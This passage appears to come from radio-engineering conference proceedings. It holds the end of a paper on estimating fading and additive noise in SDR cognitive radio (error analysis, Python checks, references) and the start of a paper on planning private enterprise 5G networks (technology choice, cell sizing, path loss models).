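    return mu, var_eta

mu, var_eta = estimate(A1=648, B1=48, C1=48, D1=303,
                       A2=2376, B2=120, C2=120, D2=773)
print(f"mu = {mu:.3f}, var_eta = {var_eta:.3f}")   # mu = 0.143, var_eta = 5.036
```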
5 Discussion

The accuracy of measurement of the parameters μ and σ²_η can be characterized by absolute and relative errors of measurement. For the considered examples, the relative errors of measurement are:

1. In Example 1: 4.5% and 0.7% for the parameters μ and σ²_η, respectively.
2. In Example 2: 2.6% and 0.5% for the parameters μ and σ²_η, respectively.

Experiments have shown that, in general, the accuracy of measurement of the parameter σ²_η is better than that of the parameter μ. Moreover, the sensitivity to changes of the parameters A_1, A_2, B_1, B_2, C_1, C_2, D_1, and D_2 is higher when estimating the parameter μ. A detailed analysis of the accuracy of measurement for the proposed technique is based on the analysis of the accuracy of indirect measurement [17, 18], which may be characterized by effects that depend on the parameters [19]. The absolute errors of measurement of μ and σ²_η (let us denote σ²_η = V_η for convenience of expressions with derivatives) in the case of indirect measurement are:

Δμ = √( Σ_q (∂μ(ω)/∂ω_q)² Δω²_q );  ΔV_η = √( Σ_q (∂V_η(ω)/∂ω_q)² Δω²_q ), (21)

where ω is the vector of parameters that determine μ and σ²_η via expression (12) and the notation system (10). In the general case, if we assume that all parameters can be characterized by uncertainty or some errors in their values, then

ω = (A_1, A_2, B_1, B_2, C_1, C_2, D_1, D_2) =
= (K_1, K_2, L_1, L_2, G, N, M, a_n, σ²_{x_n}, σ²_{η̃_1}, σ²_{η̃_2}, σ²_{ξ̃_1}, σ²_{ξ̃_2}, σ²_{Ẽ_1}, σ²_{Ẽ_2}). (22)
However, the values of G, N, M, and a_n are parameters of the physical layer of the communication system and are known a priori. The values of K_1, K_2, L_1, and L_2 are interior parameters (amplification or attenuation coefficients) of the signal processing system that implements the proposed signal measurement technique; they are set in the signal processing system and are also known. The powers of the orthogonal reference signals x_n(t), n = 1, …, N, estimated by σ²_{x_n}, are typically normalized in a communication system and known a priori. The signals η̃_1(t), η̃_2(t), ξ̃_1(t), and ξ̃_2(t) are generated in the signal processing system, which is why the values of their powers σ²_{η̃_1}, σ²_{η̃_2}, σ²_{ξ̃_1}, and σ²_{ξ̃_2} are known or can be estimated very precisely (depending on the algorithm of their generation). Thus, the only a priori unknown parameters initially estimated in the proposed technique are the variances σ²_{Ẽ} of the signal processing response, i.e. the parameters D_1 and D_2. The absolute errors of measurement of μ and σ²_η = V_η in the case of the proposed technique, taking into account in expression (21) only the uncertainty concerning ω = (D_1, D_2), are:

Δμ = √( (∂μ(ω)/∂D_1)² ΔD²_1 + (∂μ(ω)/∂D_2)² ΔD²_2 );
ΔV_η = √( (∂V_η(ω)/∂D_1)² ΔD²_1 + (∂V_η(ω)/∂D_2)² ΔD²_2 ), (23)
where ΔD_1 and ΔD_2 are the absolute errors of measurement of the variances σ²_{Ẽ} in the signal processing system, i.e. the absolute errors of estimation of the parameters D_1 and D_2. Let us find the dependences for Δμ and ΔV_η, using the notations from expression (12) for compactness:

Δμ = (1/2) √( (B²_2 ΔD²_1 + B²_1 ΔD²_2) / ((A_1 B_2 − B_1 A_2)(B_1 C_2 − B_1 D_2 − C_1 B_2 + D_1 B_2)) );
ΔV_η = √( (A²_2 ΔD²_1 + A²_1 ΔD²_2) / (A_1 B_2 − B_1 A_2)² ). (24)

The intelligent component of the proposed technique boils down to an unsupervised adaptive tuning of the signal processing system by setting the optimal values of K_1, K_2, L_1, L_2, σ²_{η̃_1}, σ²_{η̃_2}, σ²_{ξ̃_1}, and σ²_{ξ̃_2}, which minimize Δμ and (or) ΔV_η. It also takes into account the dependences between the parameters in (10), the facts that the coefficient 1/2 in expression (24) does not affect the result of the optimization and that the square root function is monotonically increasing, and that A_1 = A_1(K_1, L_1, σ²_{ξ̃_1}), A_2 = A_2(K_2, L_2, σ²_{ξ̃_2}), B_1 = B_1(K_1, L_1, σ²_{ξ̃_1}), B_2 = B_2(K_2, L_2, σ²_{ξ̃_2}), C_1 = C_1(L_1, σ²_{η̃_1}, σ²_{ξ̃_1}), C_2 = C_2(L_2, σ²_{η̃_2}, σ²_{ξ̃_2}).
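As an illustration, the error estimates (24) can be evaluated numerically for the coefficients of Example 1. The 1% relative errors assumed below for D_1 and D_2 are hypothetical, chosen only to show the relative sensitivity of the two estimates:

```python
import math

A1, B1, C1, D1 = 648, 48, 48, 303
A2, B2, C2, D2 = 2376, 120, 120, 773
dD1, dD2 = 0.01 * D1, 0.01 * D2          # assumed absolute errors of D1, D2

den = A1 * B2 - B1 * A2
num_mu = B1 * C2 - B1 * D2 - C1 * B2 + D1 * B2
d_mu = 0.5 * math.sqrt((B2**2 * dD1**2 + B1**2 * dD2**2) / (den * num_mu))
d_V = math.sqrt((A2**2 * dD1**2 + A1**2 * dD2**2) / den**2)
print(f"d_mu = {d_mu:.4f}, d_var_eta = {d_V:.4f}")   # ~0.0500 and ~0.2417
```

Even this crude check shows the asymmetry noted above: a 1% uncertainty in D_1, D_2 translates into roughly a 35% relative error in μ but only about a 5% relative error in σ²_η.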
For the minimum of Δμ:

(K_1, K_2, L_1, L_2, σ²_{η̃_1}, σ²_{η̃_2}, σ²_{ξ̃_1}, σ²_{ξ̃_2})_opt = arg min_{K_1, K_2, L_1, L_2, σ²_{η̃_1}, σ²_{η̃_2}, σ²_{ξ̃_1}, σ²_{ξ̃_2}} (B²_2 ΔD²_1 + B²_1 ΔD²_2) / ((A_1 B_2 − B_1 A_2)(B_1 C_2 − B_1 D_2 − C_1 B_2 + D_1 B_2)). (25)

For the minimum of ΔV_η:

(K_1, K_2, L_1, L_2, σ²_{ξ̃_1}, σ²_{ξ̃_2})_opt = arg min_{K_1, K_2, L_1, L_2, σ²_{ξ̃_1}, σ²_{ξ̃_2}} (A²_2 ΔD²_1 + A²_1 ΔD²_2) / (A_1 B_2 − B_1 A_2)². (26)
The optimization procedures in expressions (25) and (26) can be realized by means of a standard approach to the optimization of functions of several variables. The use of the proposed technique can be based on an SDR architecture designed as a vector processor [20]. This is possible because the signal processing in the proposed technique, represented by expression (4), is well suited to matrix and function operations when processing discretized signals in SDR receiving equipment.
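One simple way such a tuning could be carried out numerically is a direct scan of the objective (26) over a grid of interior parameters, as in the minimal sketch below; the grid ranges, the fixed values of K_1, K_2, L_1, σ²_{ξ̃_1}, and the assumed errors ΔD_1 = ΔD_2 = 1 are all illustrative, and violations of condition (20) are penalized:

```python
import numpy as np

G, N = 24, 3                       # physical-layer constants of Example 1
K1 = K2 = 1.0; L1 = 1.0; v_xi1 = 1.0
dD1 = dD2 = 1.0                    # assumed errors of D1, D2

def err_V(L2, v_xi2):
    # coefficients (10) with var_x = 1 and (1/M) * sum(a^2) = 1
    A1 = K1**2 * G * (L1**2 * G + N * v_xi1)
    A2 = K2**2 * G * (L2**2 * G + N * v_xi2)
    B1 = K1**2 * G * (L1**2 + v_xi1)
    B2 = K2**2 * G * (L2**2 + v_xi2)
    den = A1 * B2 - B1 * A2
    if abs(den) < 1e-9:            # condition (20) violated
        return np.inf
    return np.sqrt((A2**2 * dD1**2 + A1**2 * dD2**2) / den**2)

grid = [(L2, v) for L2 in np.linspace(1.1, 4.0, 30) for v in np.linspace(0.5, 2.0, 16)]
best = min(grid, key=lambda p: err_V(*p))
print("best (L2, var_xi2):", best, "-> error:", round(err_V(*best), 4))
```

Consistent with Sect. 4, the objective decreases as L_2 is moved away from L_1, which matches the smaller relative errors observed in Example 2 (L_2 = 3) compared with Example 1 (L_2 = 2).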
6 Conclusions

The intelligent signal measurement technique for spread spectrum SDR cognitive radio systems is proposed in the paper. The proposed technique is based on the indirect measurement approach and uses a correlation-based signal processing system with a set of mutually non-correlated measurement signals, which are formed additionally in the technique. The technique allows estimating the level of multiplicative noise (slow fading) and the variance of additive noise at the physical layer of a wideband radio system that uses orthogonal components and multi-position signals. The mathematical model of the signal structures in a spread spectrum SDR cognitive radio system and the parameters to be measured are analyzed. The justification of the technique contains a detailed analysis of the results of signal processing in the receiving equipment. A limitation of the proposed technique is its inability to work under certain sets of parameters, which has been analyzed in the paper. The detailed analysis of the accuracy of measurement in the proposed technique is based on the approach used for the accuracy of indirect measurement, taking into account the described mathematical model of signal and code structures in a spread spectrum cognitive radio system. The intelligent component of the proposed technique is based on an unsupervised adaptive tuning of the signal processing measurement system, realized by setting its optimal interior parameters, which minimize the measurement errors. The signal processing scheme that implements the proposed technique consists of two units that may be regarded as measurement channels. The practical significance of the results lies in the use of the proposed technique in modern SDR applications, where measurements are carried out directly at the physical layer of radio systems, in particular in SDR architectures designed as vector processors. A prospect for further research is the development of modifications of the proposed signal measurement technique in different norms, e.g., the L1 norm, which might improve the accuracy of measurement.
References

1. Zhang, J., et al.: Measurements and statistical analyses of electromagnetic noise for industrial wireless communications. Int. J. Intell. Syst. 36(3), 1304–1330 (2021). https://doi.org/10.1002/int.22343
2. Narayanan, S.J., et al.: Fuzzy decision trees embedded with evolutionary fuzzy clustering for locating users using wireless signal strength in an indoor environment. Int. J. Intell. Syst. 36(8), 4280–4297 (2021). https://doi.org/10.1002/int.22459
3. Isernhagen, H., Neemann, H., Kuhn, S., Guhmann, C.: Intelligent signal processing in an automated measurement data analysis system. In: IEEE Symposium on Computational Intelligence in Image and Signal Processing (CIISP), pp. 83–87. Honolulu, USA (2007). https://doi.org/10.1109/CIISP.2007.369298
4. Middlestead, R.W.: Digital Communications with Emphasis on Data Modems: Theory, Analysis, Design, Simulation, Testing, and Applications, chap. Spread-Spectrum Communications. Wiley, Hoboken, NJ (2017)
5. Micheletti, J.A., Godoy, E.P.: Improved indoor 3D localization using LoRa wireless communication. IEEE Lat. Am. Trans. 20(3), 481–487 (2022). https://doi.org/10.1109/TLA.2022.9667147
6. Chew, D., Adams, A.L., Uher, J.: Wireless Coexistence: Standards, Challenges, and Intelligent Solutions, chap. Intelligent Radio Concepts. Wiley, Hoboken, NJ (2021)
7. Holubnychyi, A.H., Konakhovych, G.F.: Multiplicative complementary binary signal-code constructions. Radioelectron. Commun. Syst. 61(10), 431–443 (2018). https://doi.org/10.3103/S0735272718100011
8. Holubnychyi, A.G., Konakhovych, G.F., Taranenko, A.G., Gabrousenko, Ye.I.: Comparison of additive and multiplicative complementary sequences for navigation and flight control systems. In: IEEE 5th International Conference on Methods and Systems of Navigation and Motion Control (MSNMC), pp. 24–27. Kiev, Ukraine (2018). https://doi.org/10.1109/MSNMC.2018.8576275
9. Holubnychyi, A.G., Konakhovych, G.F., Odarchenko, R.S.: Signal constructions with low resultant sidelobes for pulse compression navigation and radar systems. In: IEEE 4th International Conference on Methods and Systems of Navigation and Motion Control (MSNMC), pp. 267–270. Kiev, Ukraine (2016). https://doi.org/10.1109/MSNMC.2016.7783158
10. Fujimoto, R.: Multi-level modulation for high-speed wireless and wireline transceivers. In: IEEE International Symposium on Radio-Frequency Integration Technology (RFIT). Nanjing, China (2019). https://doi.org/10.1109/RFIT.2019.8929137
11. Kafetzis, D., Vassilaras, S., Vardoulias, G., Koutsopoulos, I.: Software-defined networking meets software-defined radio in mobile ad hoc networks: state of the art and future directions. IEEE Access 10, 9989–10014 (2022). https://doi.org/10.1109/ACCESS.2022.3144072
12. Dai, Z., et al.: DeepAoANet: learning angle of arrival from software defined radios with deep neural networks. IEEE Access 10, 3164–3176 (2022). https://doi.org/10.1109/ACCESS.2021.3140146
13. Taylor, W., et al.: AI-based real-time classification of human activity using software defined radios. In: 1st International Conference on Microwave, Antennas & Circuits (ICMAC). Islamabad, Pakistan (2021). https://doi.org/10.1109/ICMAC54080.2021.9678242
14. Fukunaga, K., Maeda, N., Miwa, K., Ota, S.: Floating circuit S-parameter measurement using indirect measurement method. In: International Symposium on Electromagnetic Compatibility (EMC EUROPE). Rome, Italy (2020). https://doi.org/10.1109/EMCEUROPE48519.2020.9245690
15. Grami, A.: Probability, Random Variables, Statistics, and Random Processes: Fundamentals & Applications. Wiley, Hoboken, NJ (2019)
16. Montgomery, D.C., Runger, G.C.: Applied Statistics and Probability for Engineers. Wiley, Hoboken (2020)
17. Figliola, R.S., Beasley, D.E.: Theory and Design for Mechanical Measurements. Wiley, Hoboken (2021)
18. Kuczmik, A., Hoffmann, S., Hoene, E.: Double pulse vs. indirect measurement: characterizing switching losses of integrated power modules with wide bandgap semiconductors. In: 11th International Conference on Integrated Power Electronics Systems (CIPS), Berlin, Germany (2020)
19. Bui, M.T., Doskocil, R., Krivanek, V.: The analysis of the effect of the parameters on indirect distance measurement using a digital camera. In: International Conference on Military Technologies (ICMT), Brno, Czech Republic (2019). https://doi.org/10.1109/MILTECHS.2019.8870101
20. Chen, W., et al.: Design space exploration of SDR vector processor for 5G micro base stations. IEEE Access 9, 141367–141377 (2021). https://doi.org/10.1109/ACCESS.2021.3119292
Optimal Structure Construction of Private 5G Network for the Needs of Enterprises Roman Odarchenko1,3(B) , Tatiana Smirnova1 , Oleksii Smirnov2 , Serhii Bondar4 , and Dmytro Volosheniuk4 1 National Aviation University, Kyiv, Ukraine {odarchenko.r.s,smirnova_t}@ukr.net 2 Central European University, Kropivnickiy, Ukraine 3 Bundleslab KFT, Budapest, Hungary 4 International Research and Training Center for Information Technologies and Systems of the National Academy of Sciences of Ukraine and Ministry of Education and Science of Ukraine, Kyiv, Ukraine [email protected], [email protected]
Abstract. Today, there is a large number of wireless technologies. A decisive role among them in the process of industrial automation is assigned to fifth-generation communication technologies. 5G networks will provide service not only to traditional cellphones, but also to a huge number of different M2M and IoT devices with specific characteristics and demands. Therefore, science-based planning and automation of information networks that serve requests with specified performance indices is a very complex scientific, technical and economic task, without which it is almost impossible to create an enterprise information infrastructure that meets all the needs and formulated requirements. Thus, the purpose of this work is to improve the network architecture of the enterprise for further optimization of the production process. A 5G network planning method for enterprise production processes has been developed. It consists of radio network coverage design, which successively determines the location of each base station using an optimized radio signal path loss model that includes a minimal carrying capacity limit, a connection quantity limit and its dependability, and of the construction of the communication transport segment, including the definition of the optimal location of the telecommunications closet facility. The developed method provides the possibility of planning the optimal structure of the 5G cellular network to optimize production processes, and of evaluating and reducing the total cost of the network construction, while guaranteeing the necessary indices of quality of service and reliability of network nodes. Keywords: 5G · private network · path loss · propagation models · network optimization · KPI · M2M communication · industrialization
1 Introduction

There are many wireless technologies currently available, most often known to users by their marketing names [1]. The use of wireless solutions is a way to create reliable and high-performance corporate networks, the use of which can significantly expand
enterprise capabilities for Internet access, efficient telephone communication (IP telephony), security of facilities and other objects using video surveillance equipment and other security and fire-alarm tools, technical process control and automation systems of industrial enterprises, systems for monitoring environmental indices, and other purposes related to telemetric data transmission. Modern wireless network solutions provide a highly controllable, automated and secure IT infrastructure. Each technology has certain characteristics that determine its field of application [2]. Under these conditions, experts assign the leading role in the automation of production processes to the 5th generation communication technology, 5G. Taking into account the fact that 5G networks will provide service not only to traditional cellphones, but also to a huge number of different M2M and IoT devices with specific characteristics and requirements, the use of Network Slicing technology can improve the efficiency of mobile communication networks and the quality of provided services. With the virtualization of the network functions of the radio access network, the main functionality of 5G base stations responsible for digital signal processing, synchronization and control will be located in the cloud (Software Defined Radio, SDR), separately from remote radio heads (RRH) and antennas, making it possible to realize the advantages of cognitive radio and to reduce the capital and operating costs of the radio access network. The use of the concept of self-organizing radio access networks (Self-Organizing Networks, SON) will increase distribution efficiency and customer service quality, and SDN, in which the network management level is separated from the transmission devices and implemented in software, will allow hardware resources to be redistributed depending on the load, increasing the efficiency of their use and reducing operating costs by automating radio planning processes and coordinating the work of neighboring base stations of different levels (micro and macro) [3]. The 5G network architecture (SDR and SDN) [4], where the network control level is separated from the transfer devices and accomplished by software tools, allows hardware resources to be redistributed depending on the load, increasing the effectiveness of their use [5, 6]. That is why the construction of such networks could be profitable for automating the production processes of a modern enterprise. Thus, it is necessary to develop the most effective approaches to planning the optimal architecture of private 5G networks for the needs of manufacturing enterprises. The rest of the paper is organized as follows: Sect. 2 provides a review of the relevant literature, Sect. 3 presents the problem statement and the main objectives of the paper, the selection of optimal design solutions for private networks is described in Sect. 4, Sect. 5 describes a method of 5G network planning for the automation of enterprise production processes, Sect. 6 contains the results of the research, their discussion is presented in Sect. 7, and, finally, Sect. 8 states the conclusions.
2 Background Analysis

Considering the 5G network planning methods [7–10], it can be stated that these methods mostly concern pure radio access network planning and optimization, and different techniques have been applied in them. For example, in [7] the network planning optimization model for 5th generation wireless technologies is formulated as a MILP task. [8] proposes a data-driven multi-objective optimization framework for ultra-dense 5G network planning with practical case studies. An efficient heuristic method,
called PLATEA, has been developed and practically applied in [9]. The most modern approaches to network planning and optimization of cellular networks of different generations are collected in [11]. 5G network planning and optimization, with an overview of planning methods and processes applicable to the 4G era and new considerations for 5G, are discussed in [7]. The studies closest to the topic of this paper are [10, 12, 13], but they also have shortcomings that need to be addressed. In addition, planning a private enterprise network based on 5G has its own peculiarities, both in terms of radio planning and in terms of transport subsystem planning. All of this should definitely be taken into consideration.
3 Problem Statement

Thus, science-based planning and automation of information networks that serve requests with specified performance indices is a very complex scientific, technical and economic task. Creating an enterprise information infrastructure that meets all the needs and formulated requirements is almost impossible without solving it. At the same time, one of the main problems in the deployment of modern wireless networks is more efficient planning, which makes it possible to provide adequate quality of service (target efficiency) and, on the other hand, to increase the economic efficiency of using network resources. So, the aim of this paper is to improve the network architecture of the enterprise for further optimization of the production process. To achieve this purpose, it is necessary to solve the following scientific tasks: to analyze and select the optimal technology for production process optimization; to improve the 5G cellular network planning method; to improve the method of designing and optimizing structured cabling systems for the transport needs of a cellular network; and to develop algorithmic support for the preliminary planning of communication networks for production needs. To achieve the objectives of the paper, the following methods have been used: mathematical statistics, methods of information theory and signal transmission, methods of the theory of propagation of electromagnetic waves, and methods of direct synthesis.
4 Selection of Optimal Design Solutions for Private Networks

Each manufacturing enterprise should count on getting the maximum effect from investing its own funds in its own informatization projects. The magnitude of this effect can be reflected in the amount of the company's profit from the implementation of the informatization project. Based on these statements, it is possible to choose the optimal project solution using the Bayes-Laplace optimality criterion (BL-criterion) [14]. It is also advisable to use the net current effect of the informatization project, as an integral index of the effectiveness of the project solution, for the evaluative optimality function.
Normally, decision making about a potential investment takes place in a situation of uncertainty. Such a formal scheme presumes the obligatory availability of [15]:

1) a set of alternative solutions D(X) available to the production enterprise, of which one must be adopted: X_i ∈ D(X), i = 1, …, n;
2) an environment with a set of mutually exclusive conditions Z_j ∈ D(Z), j = 1, …, m, where it is unknown to the enterprise which condition holds (or will hold) in that environment. In this concrete case, by the external statuses for a production enterprise that intends to optimize its production processes through automation, we mean the probability of expansion of different 5G wireless networks;
3) an evaluative optimality function E_ij that characterizes the profit (received benefit) of the production enterprise when choosing a projected solution X_i ∈ D(X) in the situation when the environment is (or will be) in the condition Z_j ∈ D(Z); it signifies the concrete value of the evaluative optimality function for the project solution X_i and the environmental condition Z_j.

In this case, the situation of making a decision on the possibility of investing in a fundamentally new information and communication infrastructure can be characterized by the matrix of projected solutions (Table 1). The matrix elements E_ij are evaluative optimality functions, i.e. the quantitative values of the optimality criterion for each projected solution X_i ∈ D(X) as long as the environment is in the state Z_j ∈ D(Z). The evaluative optimality function, which is also the quantitative value of the optimality criterion, is the profit (effect) from the accomplishment of the informatization project.

Table 1. Matrix of possible project solutions

Alternative D(X) | Expected environment condition, D(Z)
                 | Z_1  … Z_j  … Z_m
X_1              | E_11 … E_1j … E_1m
…                | …    … …    … …
X_i              | E_i1 … E_ij … E_im
…                | …    … …    … …
X_n              | E_n1 … E_nj … E_nm
According to the Bayes-Laplace criterion, the optimal solution X* ∈ D(X) is the one for which the mathematical expectation of the resultant optimality function reaches the maximum possible value [14]:

E_BL = max_{X ∈ D(X)} Σ_{j=1}^{m} p_j · E_ij.
The set of optimal variants according to the BL-criterion is defined in the following way:

X* = { X_i : X_i ∈ D(X) ∧ E_BL = max_{X_i ∈ D(X)} Σ_{j=1}^{m} p_j · E_ij }.
When the posterior probabilities of the environmental states are all equal, the BL-criterion transforms into the Bernoulli-Laplace criterion:

E_BL = (1/m) · max_{X_i ∈ D(X)} Σ_{j=1}^{m} E_ij.
Therefore, for the optimal choice of communication technology to support the automation of enterprise production processes, a set of possible project solutions D(X) for constructing a 5G network and a set of expected future environmental conditions D(Z) have to be created. As an example, this set could include the possible frequency ranges for deploying different technologies in the available RF spectrum (Table 2).

Table 2. Matrix for selecting a project solution for a cellular operator

Alternative solution D(X)      | Environment condition D(Z) (frequency range, MHz) with probability distribution                         | Resultant evaluative function
(cellular network technology)  | Z_1: 700  | Z_2: 800  | Z_3: 900   | Z_4: 1,800 | Z_5: 2,100 | Z_6: 2,600 | E_BL = Σ_{j=1}^{m} P_j · E_ij
                               | P_1 = 0   | P_2 = 0   | P_3 = 0.25 | P_4 = 0.25 | P_5 = 0.25 | P_6 = 0.25 |
Macrocells                     | 0         | 0         | 2          | 0          | 1.8        | 0          | 0.95
Microcells                     | 3         | 3         | 0          | 3          | 0          | 2.7        | 1.425
We assume that 5G networks using various potentially appropriate frequency bands (700 MHz, 800 MHz, 900 MHz, 1,800 MHz, 2,100 MHz, 2,600 MHz) can be deployed. Since the "700 MHz" and "800 MHz" bands are still used by other radio technologies, the deployment probability for these bands is 0; for the other bands, equal probabilities were used. Macro- and microcell technologies are both included as alternatives. It should be emphasized that the net present effect values are calculated from expert evaluations and entered in Table 2 in conditional units. As an optimality criterion for the first information condition, the minimum of the dispersion of the evaluative function or the maximum entropy of its mathematical expectation can be used [6].
Thus, after analyzing the result presented in Table 2 (the value of the resultant evaluative function is greater for microcells), the conclusion can be made that it is precisely microcell network structures in the 700, 800 or 2,600 MHz ranges that should be expanded at enterprises.
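The resultant evaluative functions in Table 2 are straightforward to recompute. A short Python check, with the values taken directly from Table 2, is given below:

```python
# Bayes-Laplace rule: E_BL,i = sum_j p_j * E_ij, applied to Table 2.
p = [0.0, 0.0, 0.25, 0.25, 0.25, 0.25]            # P1..P6 for 700..2,600 MHz
E = {
    "macrocells": [0, 0, 2, 0, 1.8, 0],
    "microcells": [3, 3, 0, 3, 0, 2.7],
}
scores = {name: sum(pj * eij for pj, eij in zip(p, row)) for name, row in E.items()}
print(scores)                                     # {'macrocells': 0.95, 'microcells': 1.425}
print("optimal alternative:", max(scores, key=scores.get))   # microcells
```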
5 5G Network Planning for Automation of Enterprise Production Processes

Planning a wireless network for the automation of enterprise production processes must be performed according to the following steps: designing the radio network coverage, with determination of the base station (gNb in 5G networks) locations, and constructing the communication transport segment, including the location of the telecommunication closets. These steps are presented in detail below.

5.1 Radio Access Network Planning

For the construction of the base station subsystem, a new model has been developed [16]. The quantity of cell sites (gNb) necessary to cover the whole required service zone can be defined by the following formula:

N_BS = S_serv / S_cell, (1)
where S_serv is the entire area within which terminal network nodes are connected. The area serviced by one gNb cell can be defined as

S_cell = π · r²_max, (2)

where r_max is the maximal cell radius, which is a function of various variables:

r_max = f(P_gNb, G_tx, G_rx, B_node, B_feed, IM, L_path, R_node, N_node, C_gNb, p_bit), (3)

where P_gNb is the transmitter power; G_tx and G_rx are the antenna gains for transmission and reception, respectively; B_node denotes the losses at the terminal device; B_feed denotes the losses at the feeder (when the feeder is absent, i.e. the transceiver is united with the antenna in an all-in-one unit, the specifics of the connectivity device design must be taken into account); IM is the interference margin; L_path denotes the losses along the radio signal propagation path; R_node is the necessary data transmission rate for a terminal node; N_node is the quantity of terminal nodes; C_gNb is the total available traffic capacity of the gNb in the cell; and p_bit is the bounding probability of bit error. Accordingly, the quantity of necessary gNbs is a function of numerous variables, and in order to reduce the expenses of the network construction it needs to be minimized:

N_gNb = f(P_gNb, G_tx, G_rx, B_node, B_feed, IM, L_path, R_node, N_node, C_gNb, p_bit) → min. (4)

Taking into account the fact that some variable parameters are specified in practice (system technical characteristics), the parametric optimization problem can be represented as follows:

r_max = f(P_gNb, G_tx, G_rx, B_node, B_feed, IM, L_path, R_node, N_node, C_gNb, p_bit, h_gNb, h_node) → max, (5)

subject to the following limits: 0 < P_gNb ≤ P_gNb.max; R_node.min < R_node ≤ R_node.max; 0 ≤ p_bit ≤ p_bit.add; h_gNb.min ≤ h_gNb ≤ h_gNb.max; TC ≤ TC_add. The price of the cell site installation includes the cost of the gNb TC_gNb, the gNb installation price TC_inst.gNb, the antenna erection price TC_inst.ant, the antenna and feeder line installation price TC_feed, and the price of the antenna TC_ant:

TC = TC_gNb + TC_inst.gNb + TC_feed + TC_ant + TC_inst.ant,
(6)
The price of the antenna and feeder line is TC_ant = TC_m.ant · l_feed, where l_feed is the length of the antenna and feeder line; the antenna erection price for the height h_gNb is TC_inst.ant = h_gNb · TC_m.inst.ant, where TC_m.inst.ant is the installation price per meter of gNb antenna height. TC_inst.gNb is defined by the contractor accomplishing the works, and TC_ant is defined by the equipment manufacturer. The total carrying capacity of one gNb can be defined using the following equation:

C_gNB = ΔF · β,
(7)
where β is the spectral efficiency of the base station and ΔF is the total frequency band reserved in the cell for one gNb. The carrying capacity necessary to provide service to all users in the cell can be defined in the following way:

R_tot = R_node · N_act.node,
(8)
where N_act.node is the quantity of active users that need to be served. This value must not exceed the total base station carrying capacity: R_tot ≤ C_gNb. The quantity of active users depends on the service areas within the enterprise buildings S_build and on the street S_outdoor, on the switched node densities σ in the buildings and on the street, respectively, and on the corresponding activity indices ν:

N_act.node = ν_build · σ_build · S_build · N_floors + ν_outdoor · σ_outdoor · S_outdoor,
(9)
Node switching densities are defined in the following way (cf. Fig. 1):

σ = N_node / S.
(10)
The following condition needs to hold for R_tot:

R_tot = R_node · (ν_build · σ_build · S_build · N_floor + ν_outdoor · σ_outdoor · S_outdoor) ≤ ΔF · β.
(11)
The area of enclosed facilities within the cell can be computed in the following way:

S_build = S_cell · ω_build.
(12)
The coverage area in the open region is then

S_outdoor = S_cell − S_build = π · r²_max − π · r²_max · ω_build = π · r²_max (1 − ω_build). (13)

Accordingly:

R_tot = R_node · (ν_build · σ_build · π · r²_max · ω_build · N_floor + ν_outdoor · σ_outdoor · π · r²_max · (1 − ω_build)) = R_node · π · r²_max · (ν_build · σ_build · ω_build · N_floor + ν_outdoor · σ_outdoor · (1 − ω_build)) ≤ ΔF · β. (14)
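Condition (14) can be inverted to give the capacity-limited cell radius. A minimal sketch follows; all numeric inputs are illustrative assumptions, not values prescribed by the method:

```python
import math

dF_beta = 100e6 * 10            # available cell throughput dF * beta, bit/s (assumed)
R_node = 1e6                    # required rate per terminal node, bit/s (assumed)
nu_b, sigma_b, omega_b, N_floor = 0.5, 0.01, 0.3, 3   # indoor activity, density (1/m^2),
                                                      # built-up share, floors (assumed)
nu_o, sigma_o = 0.2, 0.001      # outdoor activity and density (assumed)

# effective served-node density per unit cell area, from (14)
density = nu_b * sigma_b * omega_b * N_floor + nu_o * sigma_o * (1 - omega_b)
r_max_capacity = math.sqrt(dF_beta / (R_node * math.pi * density))
print(f"capacity-limited r_max = {r_max_capacity:.0f} m")   # about 262 m here
```

The final cell radius is then the smaller of this capacity-limited value and the coverage-limited radius that follows from the path loss analysis below.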
The maximum allowable path loss for 5G networks can be determined as follows. 5G systems use frequency ranges from microwave to millimeter-wave. That is why the standardized models cover a very wide spectrum of operating ranges and have a frequency-dependent component to support frequencies from 400 MHz to 100 GHz. The frequency dependence is defined not only for the path loss but also for each model parameter necessary for the impulse characteristics, and four categories of path loss models are described, each of which has LOS components (signal propagation in the line-of-sight zone) and NLOS components (signal propagation in the non-line-of-sight zone). Taking a 3D-UMa environment (three-dimensional urban macrocells) to estimate NLOS [17], the following model for estimating radio signal power losses along the propagation path can be used:

PL^5G_3DUMaNLOS = max(PL^5G_3DUMaLOS, PL^5G(a)_3DUMaNLOS), (15)
Fig. 1. Schematic picture of the basic station service zone (production facilities are depicted in black)
where

PL^5G_3DUMaLOS = { PL_1, 10 m < d < d_break; PL_2, d_break < d < 5 km. (16)
Taking into account that

PL_1 = 28.0 + 22 log(d) + 20 log(f), (17)

PL_2 = 28.0 + 40 log(d) + 20 log(f) − 9 log((d_break)² + (h_t − h_r)²), (18)
we obtain the following:

PL^5G(a)_3DUMaNLOS = 13.54 + 39.08 log(d) + 20 log(f) − 0.6 (h_r − 1.5) (19)

for connection distances from 10 m to 5 km.
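Expressions (15)-(19) translate directly into code. In the sketch below, d is in metres, f is in GHz and the antenna heights are in metres, following the conventions of [17]; the breakpoint distance d_break is passed in as an input, since its computation is not reproduced in the paper:

```python
import math

def pl_3d_uma_los(d, f, h_t, h_r, d_break):
    """LOS path loss (16)-(18), dB."""
    if d <= d_break:
        return 28.0 + 22 * math.log10(d) + 20 * math.log10(f)          # (17)
    return (28.0 + 40 * math.log10(d) + 20 * math.log10(f)
            - 9 * math.log10(d_break**2 + (h_t - h_r)**2))             # (18)

def pl_3d_uma_nlos(d, f, h_t, h_r, d_break):
    """NLOS path loss (15) with the analytical term (19), dB."""
    pl_a = 13.54 + 39.08 * math.log10(d) + 20 * math.log10(f) - 0.6 * (h_r - 1.5)
    return max(pl_3d_uma_los(d, f, h_t, h_r, d_break), pl_a)

# Illustrative call: 200 m link at 3.5 GHz, 25 m gNb, 1.5 m terminal
print(f"{pl_3d_uma_nlos(d=200, f=3.5, h_t=25, h_r=1.5, d_break=160):.1f} dB")
```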
5.2 Backhaul Planning

Justified planning and optimization procedures for a 5G wireless information network cannot be done without calculating the design of the structured cabling system (SCS) that connects the different parts of the network. Horizontal subsystem design is the most important part of the SCS development stage. The decisions made in the process of accomplishing this work determine the technical and economic efficiency of the created SCS, and also have a huge influence on the capital costs of creating the information network. It is in the horizontal subsystem that the vast majority of SCS telecommunication equipment is situated, both in terms of variety and quantity, and in terms of price.
Let us consider two basic methods for calculating the quantity of cable expended on the horizontal subsystem:

• the summation method;
• the statistical method.

